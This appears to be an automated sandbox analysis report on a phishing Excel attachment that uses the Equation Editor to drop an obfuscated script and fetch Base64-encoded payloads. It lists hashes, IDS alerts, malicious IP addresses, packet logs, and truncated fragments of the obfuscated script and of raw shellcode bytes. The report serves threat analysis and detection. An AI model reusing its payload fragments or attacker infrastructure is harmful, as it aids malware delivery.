                                                            List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Document.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 142.215.209.77
                                                            Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            gr5zS9wytq.batGet hashmaliciousUnknownBrowse
                                                            • 142.215.209.77
                                                            No context
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4760
                                                            Entropy (8bit):4.834060479684549
                                                            Encrypted:false
                                                            SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                            MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                            SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                            SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                            SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:@...e...........................................................
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (3044), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):153576
                                                            Entropy (8bit):3.7932912878870217
                                                            Encrypted:false
                                                            SSDEEP:3072:djEtkQFrUtl7sD+jEtkQFrUtl7sqjEtkQFrUtl7sb:5EUf7sDqEUf7seEUf7sb
                                                            MD5:C48EB9D2C1314538BE91CAF7DB10F261
                                                            SHA1:A43F3F61CCFAD8E61DEA2082FA69CA4C557D22A0
                                                            SHA-256:C96199A58AE0B36B5AB830211F97F265B72D3B40447F7FFFFE14928C0550CD47
                                                            SHA-512:72AD41DAF61604515CD4ED2178A82FF44462526724F927A44B585AA8A0CCE4554E80BC76DE15073B151E9FA11182C89DD3B4E4AC33B976B51ED1D6B377EFA74B
                                                            Malicious:true
                                                            Preview:...... . . . .....Z.Z.G.i.W.B.c.u.e.t.i.Z.o.W.L. .=. .".L.G.k.o.W.i.c.R.q.W.b.A.o.b.W.".....g.Q.L.n.z.n.e.W.p.L.o.g.L.k.i. .=. .".L.O.L.L.L.c.L.c.L.W.h.i.K.z.K.".....G.c.P.g.c.Z.l.A.e.o.x.C.W.W.J. .=. .".W.W.k.h.o.q.i.W.G.k.o.d.L.i.R.".........c.G.O.W.U.P.m.a.u.v.v.O.k.K.L. .=. .".O.K.A.i.o.b.I.L.U.G.i.c.e.L.p.".....f.W.e.L.a.c.i.R.G.f.G.m.L.O.p. .=. .".Z.G.n.L.A.B.c.K.v.u.h.L.K.W.x.".....t.m.t.k.k.c.B.i.L.G.P.P.m.l.L. .=. .".m.L.G.J.c.c.f.i.z.j.W.A.G.e.Z.".....L.L.L.W.m.N.x.n.i.G.W.W.I.O.k. .=. .".k.q.K.K.a.h.W.W.P.b.d.G.K.L.W.".....Z.L.c.C.L.k.t.P.U.z.q.u.i.h.U. .=. .".z.S.o.O.G.C.I.K.i.W.i.L.b.O.W.".....P.L.K.z.O.K.f.W.Q.r.j.K.P.L.e. .=. .".c.c.m.A.G.W.C.j.B.c.P.c.L.L.L.".....v.K.G.a.d.f.r.U.C.G.k.f.L.J.U. .=. .".c.N.h.u.z.K.z.W.k.O.W.f.r.W.o.".....L.B.P.N.K.m.O.f.z.L.p.L.R.R.l. .=. .".U.A.g.e.O.m.m.L.h.b.o.z.Z.N.U.".....S.P.j.b.i.m.z.G.t.i.b.a.r.i.W. .=. .".O.W.L.R.B.j.f.K.k.W.W.K.B.A.l.".....G.x.m.h.B.G.S.u.d.B.i.R.n.p.K. .=. .".G.L.Z.L.W.B.a.G.L.i.Z.q.L.W.k.".....m.p.S.z.n.N.q.d.
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (3044), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):153576
                                                            Entropy (8bit):3.7932912878870217
                                                            Encrypted:false
                                                            SSDEEP:3072:djEtkQFrUtl7sD+jEtkQFrUtl7sqjEtkQFrUtl7sb:5EUf7sDqEUf7seEUf7sb
                                                            MD5:C48EB9D2C1314538BE91CAF7DB10F261
                                                            SHA1:A43F3F61CCFAD8E61DEA2082FA69CA4C557D22A0
                                                            SHA-256:C96199A58AE0B36B5AB830211F97F265B72D3B40447F7FFFFE14928C0550CD47
                                                            SHA-512:72AD41DAF61604515CD4ED2178A82FF44462526724F927A44B585AA8A0CCE4554E80BC76DE15073B151E9FA11182C89DD3B4E4AC33B976B51ED1D6B377EFA74B
                                                            Malicious:true
                                                            Preview:...... . . . .....Z.Z.G.i.W.B.c.u.e.t.i.Z.o.W.L. .=. .".L.G.k.o.W.i.c.R.q.W.b.A.o.b.W.".....g.Q.L.n.z.n.e.W.p.L.o.g.L.k.i. .=. .".L.O.L.L.L.c.L.c.L.W.h.i.K.z.K.".....G.c.P.g.c.Z.l.A.e.o.x.C.W.W.J. .=. .".W.W.k.h.o.q.i.W.G.k.o.d.L.i.R.".........c.G.O.W.U.P.m.a.u.v.v.O.k.K.L. .=. .".O.K.A.i.o.b.I.L.U.G.i.c.e.L.p.".....f.W.e.L.a.c.i.R.G.f.G.m.L.O.p. .=. .".Z.G.n.L.A.B.c.K.v.u.h.L.K.W.x.".....t.m.t.k.k.c.B.i.L.G.P.P.m.l.L. .=. .".m.L.G.J.c.c.f.i.z.j.W.A.G.e.Z.".....L.L.L.W.m.N.x.n.i.G.W.W.I.O.k. .=. .".k.q.K.K.a.h.W.W.P.b.d.G.K.L.W.".....Z.L.c.C.L.k.t.P.U.z.q.u.i.h.U. .=. .".z.S.o.O.G.C.I.K.i.W.i.L.b.O.W.".....P.L.K.z.O.K.f.W.Q.r.j.K.P.L.e. .=. .".c.c.m.A.G.W.C.j.B.c.P.c.L.L.L.".....v.K.G.a.d.f.r.U.C.G.k.f.L.J.U. .=. .".c.N.h.u.z.K.z.W.k.O.W.f.r.W.o.".....L.B.P.N.K.m.O.f.z.L.p.L.R.R.l. .=. .".U.A.g.e.O.m.m.L.h.b.o.z.Z.N.U.".....S.P.j.b.i.m.z.G.t.i.b.a.r.i.W. .=. .".O.W.L.R.B.j.f.K.k.W.W.K.B.A.l.".....G.x.m.h.B.G.S.u.d.B.i.R.n.p.K. .=. .".G.L.Z.L.W.B.a.G.L.i.Z.q.L.W.k.".....m.p.S.z.n.N.q.d.
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):165
                                                            Entropy (8bit):1.4377382811115937
                                                            Encrypted:false
                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                            Malicious:false
                                                            Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):165
                                                            Entropy (8bit):1.4377382811115937
                                                            Encrypted:false
                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                            Malicious:true
                                                            Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            File type:Microsoft Excel 2007+
                                                            Entropy (8bit):7.997902781479928
                                                            TrID:
                                                            • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                                                            • ZIP compressed archive (8000/1) 18.60%
                                                            File name:Comprobante de pago.xlam.xlsx
                                                            File size:603'526 bytes
                                                            MD5:ad8b92e44bd2d3703c895e34ca4e2865
                                                            SHA1:6503ab3f0a7adbeb16b389d29ed2a2c6f742bf5a
                                                            SHA256:4d6ddf9237e8dce54263bfe1df769f0c2fb6941713b7959decc1a7822e6e8e9b
                                                            SHA512:77b52cf2d549718f49f7a5463ff342101d7853c415e17711e74b23c7591ed23cb8cdf5f5befa64155a75a66e3316ba1bcdc536affb1c7fecfa4b796529f4169c
                                                            SSDEEP:12288:UDwD0iqzsu+2WzssUfaKLxLtyONgw+ngPOkgQqdroocx1p0N+W1:R0iqj+2d1FFNgwtP7gfdrBU6NZ
                                                            TLSH:97D423C5B15886BC7AFEA1A20910A1EAC61F7D7B1F43FA3730FC851C6667862914F194
                                                            File Content Preview:PK........(o}Y.Jeq....F.......[Content_Types].xmlUT...P.IgP.IgP.Ig..MO.@.......^......b8.=.....r..N.m.K;KH.}..D."1Qr.e...............kqV.D.^.m...........^...k.B...'.....Tp..Z.9.oR.j..U!...4$..?.LFPs...<.}.*..>......+..........4...r...j.1Z. sX....R...(.A=9
                                                            Icon Hash:2562ab89a7b7bfbf
                                                            Document Type:OpenXML
                                                            Number of OLE Files:1
                                                            Has Summary Info:
                                                            Application Name:
                                                            Encrypted Document:False
                                                            Contains Word Document Stream:False
                                                            Contains Workbook/Book Stream:False
                                                            Contains PowerPoint Document Stream:False
                                                            Contains Visio Document Stream:False
                                                            Contains ObjectPool Stream:False
                                                            Flash Objects Count:0
                                                            Contains VBA Macros:False
                                                            Author:Mancilla, Jesus
                                                            Last Saved By:USER
                                                            Total Edit Time:0
                                                            Create Time:2022-08-10T18:51:50Z
                                                            Last Saved Time:2023-08-08T20:02:56Z
                                                            Creating Application:Microsoft Excel
                                                            Security:0
                                                            Thumbnail Scaling Desired:false
                                                            Company:
                                                            Contains Dirty Links:false
                                                            Shared Document:false
                                                            Changed Hyperlinks:false
                                                            Application Version:16.0300
                                                            General
                                                            Stream Path:\x1OLE10nAtiVe
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:805273
                                                            Entropy:5.994343663865783
                                                            Base64 Encoded:False
                                                            Data ASCII:s . . . q 5 . . . y - B . . . Q E . . Q . . . . . . k \\ W . : . D . f O B P o . . 1 . . < ? . : N ) . . . a W 5 D . . H Z . . . g = a s 0 7 . A Z . 7 ] F S n . 6 P ] ] . U . H . Q . Y e q > ! a . E k = e v 7 { L L ; l ` v M n . . n k / . F Z _ ( N P 6 . W s w : . 8 O . ' : E . J . { . . . . . ) . X m u ] 5 . E . . l > . J . e C c V . - G : . X . 3 M ~ . J N % ) 2 . . c . 0 7 : . # . . G \\ . s . F K # . { U ' J l } Y . , E B . \\ & O . s . B f . / . d J Z $ I 2 s . @ = & . . _ , d [ : h V ? ~ t d E s . X N
                                                            Data Raw:73 c3 01 02 03 a0 71 35 8c 07 01 08 79 2d ba c3 42 ba ff f7 d2 8b 0a 8b 09 be 51 45 f6 87 81 ee a1 dd af 87 8b 16 51 ff d2 05 16 eb 1f 94 05 04 16 e0 6b ff e0 5c 57 2e 3a 09 b4 8c 44 00 66 4f 9e 42 50 8f ba 6f 83 9d 88 0c 01 31 eb 81 9a 0d a2 3c 3f c5 1e 9b b5 3a 4e ac 29 19 a1 ac 81 b2 f5 0d db 89 61 57 81 e8 da e3 eb 35 44 d3 df 92 f1 e3 85 ed 87 b9 48 ce 5a 9d 07 81 c0 02 d3 82
                                                            General
                                                            Stream Path:4f5P18vOsVJxFSW
                                                            CLSID:
                                                            File Type:empty
                                                            Stream Size:0
                                                            Entropy:0.0
                                                            Base64 Encoded:False
                                                            Data ASCII:
                                                            Data Raw:
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-01T14:27:54.415377+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound187.121.86.10580192.168.2.2249163TCP
                                                            2024-12-01T14:27:54.415377+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)187.121.86.10580192.168.2.2249163TCP
                                                            2024-12-01T14:28:04.967788+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.77443192.168.2.2249162TCP
                                                            2024-12-01T14:28:16.868476+01002020423ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound187.121.86.10580192.168.2.2249163TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 1, 2024 14:27:54.415376902 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:54.535595894 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:54.535693884 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:54.537221909 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:54.657440901 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.820698023 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.820846081 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:55.820888042 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.820904016 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.820920944 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.820929050 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:55.820939064 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.820950985 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:55.820955992 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.820974112 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.820976973 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:55.820976973 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:55.821068048 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:55.821088076 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.821115017 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.821124077 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.821162939 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:55.826477051 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:55.942671061 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.942740917 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:55.942794085 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:55.942843914 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.012726068 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.012798071 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.012804031 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.012845039 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.062645912 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.062691927 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.062750101 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.062791109 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.132774115 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.132791042 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.132972956 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183092117 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183137894 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183144093 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183187962 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183190107 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183222055 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183235884 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183248043 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183263063 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183273077 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183285952 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183305979 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183310986 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183329105 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183346033 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183346033 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183362007 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183371067 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183377981 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183389902 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183415890 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183429956 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183607101 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183650970 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183667898 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183685064 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183696985 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183701038 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.183717012 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.183738947 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.184129953 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.204701900 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.204855919 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.204866886 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.204910040 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.208678961 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.208730936 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.208776951 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.208818913 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.216448069 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.216497898 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.216546059 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.224181890 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.224252939 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.224303007 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.252959013 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.253171921 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.253180027 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.253222942 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.256844044 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.256907940 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.256968021 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.257569075 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.303590059 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.303627968 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.303769112 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.307322025 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.307378054 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.307416916 CET804916187.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:27:56.307463884 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:56.964184046 CET4916180192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:27:59.282058954 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:27:59.282105923 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:27:59.282169104 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:27:59.293220997 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:27:59.293236017 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:00.853554010 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:00.853619099 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:00.859707117 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:00.859723091 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:00.860008955 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:00.912755013 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:00.955331087 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.296876907 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.296946049 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.296998978 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.297013998 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.328227043 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.328249931 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.328391075 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.328402042 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.468764067 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.468789101 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.468929052 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.468946934 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.504719019 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.504741907 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.504760981 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.504782915 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.504806042 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.504811049 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.504849911 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.504858971 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.530371904 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.530400991 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.530422926 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.530428886 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.530452013 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.530459881 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.530493021 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.530502081 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.549515963 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.549540043 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.549559116 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.549586058 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.549593925 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.549617052 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.591892004 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.591914892 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.591948986 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.591974020 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.591985941 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.592046022 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.663542032 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.663566113 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.663594961 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.663618088 CET49162443192.168.2.22142.215.209.77
